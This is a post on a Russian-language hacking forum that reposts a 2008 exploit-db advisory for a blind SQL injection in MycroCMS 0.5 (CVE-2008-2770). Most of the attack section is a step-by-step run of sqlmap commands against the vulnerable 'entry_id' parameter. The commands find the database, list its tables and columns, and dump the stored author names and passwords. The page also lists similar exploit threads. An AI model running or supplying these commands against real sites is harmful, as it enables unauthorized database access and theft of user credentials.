Exploit MycroCMS 0.5 - Blind SQL Injection

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
5787
Проверка EDB
  1. Пройдено
Автор
CWH UNDERGROUND
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-2770
Дата публикации
2008-06-11
Код: 
=======================================================
 MycroCMS 0.5 Remote Blind SQL Injection Vulnerability 
=======================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'

AUTHOR : CWH Underground
DATE   : 11 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : MycroCMS
 VERSION     : 0.5 (Lastest Version)
 DOWNLOAD    : http://downloads.sourceforge.net/mycrocms
#####################################################

---Remote Blind SQL Injection---

***magic_quotes_gpc = off***

-----------------
 Vulnerable Path
-----------------

[+] http://[Target]/[mycrocms_path]/mycrocms/?entry_id=[Blind SQL]


---------------------------------
 Blind SQL Injection with SqlMap
---------------------------------

[+] Find DB name
POC Exploit: ./sqlmap.py -p "entry_id" -a "./txt/user-agents.txt" --current-db -u http://localhost/mycrocms/?entry_id=3

[+] Enumerate All Tables (Use Database "mycrocms")
POC Exploit: ./sqlmap.py -p "entry_id" -a "./txt/user-agents.txt" -D "mycrocms" --tables -u http://localhost/mycrocms/?entry_id=3

[+] Enumerate All Columns in Table (Use Table "mbauthor")
POC Exploit: ./sqlmap.py -p "entry_id" -a "./txt/user-agents.txt" -D "mycrocms" -T "mbauthor" --columns -u http://localhost/mycrocms/?entry_id=3

[+] Dump All Data in Column (Use Column "author_name" and "author_pw")
POC Exploit: ./sqlmap.py -p "entry_id" -a "./txt/user-agents.txt" -D "mycrocms" -T "mbauthor" -C author_name,author_pw --dump -u http://localhost/mycrocms/?entry_id=3


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-11]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit Tuleap 9.17.99.189 - Blind SQL Injection
Ответы
0
Просмотры
678
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit [Turkish] Blind SQL Injection Attacks
Ответы
0
Просмотры
706
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit dotCMS 3.6.1 - Blind Boolean SQL Injection
Ответы
0
Просмотры
656
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit PHP Classifieds Rental Script - Blind SQL Injection
Ответы
0
Просмотры
624
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit B2B Portal Script - Blind SQL Injection
Ответы
0
Просмотры
623
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Ktools Photostore 4.7.5 - Blind SQL Injection
Ответы
0
Просмотры
577
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Content-Based Blind Injection Using By Double Substring
Ответы
0
Просмотры
519
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit JoomShopping - Blind SQL Injection
Ответы
0
Просмотры
483
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Milw0rm Clone Script 1.0 - 'related.php?program' Blind SQL Injection
Ответы
0
Просмотры
467
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit YourMembers Plugin - Blind SQL Injection
Ответы
0
Просмотры
462
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу